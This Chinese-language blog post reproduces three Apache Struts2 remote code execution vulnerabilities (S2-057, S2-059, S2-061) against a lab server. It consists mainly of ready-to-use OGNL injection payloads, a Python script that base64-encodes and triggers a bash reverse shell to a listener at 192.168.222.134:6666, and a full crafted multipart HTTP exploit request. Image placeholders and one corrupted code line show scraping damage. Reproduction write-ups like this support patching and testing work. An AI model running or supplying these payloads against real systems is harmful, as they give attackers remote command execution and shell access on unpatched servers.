中间件安全|Struts2 远程代码执行漏洞复现（附Struts2漏洞检测工具） java|后端|struts

0x00 Struts2 简介 Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架，本质上相当于一个 servlet。Struts2 基于 MVC 架构，框架结构清晰。通常作为控制器（Controller）来建立模型与视图的数据交互，用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行，
0x01 Struts2 (CVE-2018-11776) Struts2 S2-057

payload：/struts2-showcase/$%7B233*233%7D/actionChain1.action

验证漏洞存在：

中间件安全|Struts2 远程代码执行漏洞复现（附Struts2漏洞检测工具）

文章图片

paylaod：ls：查看目录下文件，paylaod需要进行url编码 ${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

【中间件安全|Struts2 远程代码执行漏洞复现（附Struts2漏洞检测工具）】

文章图片

0x02 Struts2 (CVE-2019-0230) Struts2 S2-059

漏洞验证paylaod：/?id=%25{2*5}

文章图片

反弹shell：paylaod：使用python3环境，运行前查看环境执行是否正常

反弹paylaod：bash -i >& /dev/tcp/192.168.222.134/6666 0>&1 需要base64加密放入下paylaod import requests url = "http://192.168.222.134:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}" } data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}" } res1 = requests.post(url, data=https://www.it610.com/article/data1) res2 = requests.post(url, data=data2) print(123)

执行脚本

文章图片

shell接收成功：

文章图片

0x03 Struts2 (CVE-2020-17530) Struts2 S2-061

POC：post请求： POST / HTTP/1.1 Host: 192.168.222.134:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,image/apng,*/*; q=0.8,application/signed-exchange; v=b3; q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh; q=0.9 Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0 If-None-Match: W/"187-1504645830000" If-Modified-Since: Tue, 05 Sep 2017 21:10:30 GMT Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF Connection: close Content-Length: 829------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))} ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--